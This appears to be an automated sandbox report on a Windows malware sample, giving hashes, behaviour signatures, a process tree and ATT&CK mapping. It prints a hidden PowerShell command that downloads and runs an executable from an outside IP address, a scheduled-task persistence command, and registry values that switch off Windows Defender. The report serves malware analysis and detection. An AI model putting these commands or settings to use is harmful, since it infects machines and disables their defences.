Analysis
-
max time kernel
94s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
21-02-2025 22:51
Static task
static1
Behavioral task
behavioral1
Sample
3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe
Resource
win7-20240903-en
General
-
Target
3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe
-
Size
938KB
-
MD5
0d9785e60c0a3c69cf5813f12a1b3839
-
SHA1
c11fbe1fb2023566108ce47e698b1a1483d97f4d
-
SHA256
3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032
-
SHA512
39b102dcfca5042e01bfce8a0e91b56456e9b90ad52fc97cdf2bee6a88d4169e8b791ad15367337e6ee72b1849c6c174d537056ff3c5ff44efd893dbfe111d0b
-
SSDEEP
24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8aegl:ZTvC/MTQYxsWR7aeg
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4592-38-0x00000000006E0000-0x0000000000B4A000-memory.dmp healer behavioral2/memory/4592-39-0x00000000006E0000-0x0000000000B4A000-memory.dmp healer behavioral2/memory/4592-44-0x00000000006E0000-0x0000000000B4A000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 13 5212 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5212 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 13 5212 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5212 powershell.exe 5212 powershell.exe 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5212 powershell.exe Token: SeDebugPrivilege 4592 Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4496 wrote to memory of 4356 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 85 PID 4496 wrote to memory of 4356 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 85 PID 4496 wrote to memory of 4356 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 85 PID 4496 wrote to memory of 4060 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 86 PID 4496 wrote to memory of 4060 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 86 PID 4496 wrote to memory of 4060 4496 3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe 86 PID 4356 wrote to memory of 5692 4356 cmd.exe 88 PID 4356 wrote to memory of 5692 4356 cmd.exe 88 PID 4356 wrote to memory of 5692 4356 cmd.exe 88 PID 4060 wrote to memory of 5212 4060 mshta.exe 90 PID 4060 wrote to memory of 5212 4060 mshta.exe 90 PID 4060 wrote to memory of 5212 4060 mshta.exe 90 PID 5212 wrote to memory of 4592 5212 powershell.exe 95 PID 5212 wrote to memory of 4592 5212 powershell.exe 95 PID 5212 wrote to memory of 4592 5212 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe"C:\Users\Admin\AppData\Local\Temp\3d37e462a2809c12e5c1126ac2b8f2d2d5f5b940f730973920f3e471e5e21032.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn QTwbfmayrO5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sO8MZDqLZ.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn QTwbfmayrO5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sO8MZDqLZ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5692
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\sO8MZDqLZ.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5212 -
C:\Users\Admin\AppData\Local\Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE"C:\Users\Admin\AppData\Local\Temp6ZLUQVWL0PNOG1KXNQE6AUWEQE7WLLBW.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
5Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5f55849efa5c6a2ea4cfe6d5467e7c85d
SHA1a6ce257e4e6c36d3b7bfa203b7168eca537224e8
SHA256a6ee22805ca4eef905f2c7ca3bb38f3e895fd91dcceb63038ed2065c4c18da7b
SHA512866ae7fb82fbbe6d35221d24ac143d6f7ef58483090ef433e0cd1de5251a20d409b898c19d7c53d07e5b08165755a926488344b5f599f2ccc7f35bb9818cdc11
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
726B
MD579a64c9627ad8cf4ddf1d23771caf48e
SHA19a1728c7c5eab21ce225eda0853de2f9927c4413
SHA256c79ea7ae509eadeade53395a152d79753359b567b1f5409e2fb88b2a5587839c
SHA5128100f5bfd537b8425a21811da240fdfe617cb6a19eae59ebc3637bbb39bc86b03c739acbb6388b357fbc5938ba9bb39b59af439b730e9a5f0e664ca60746a780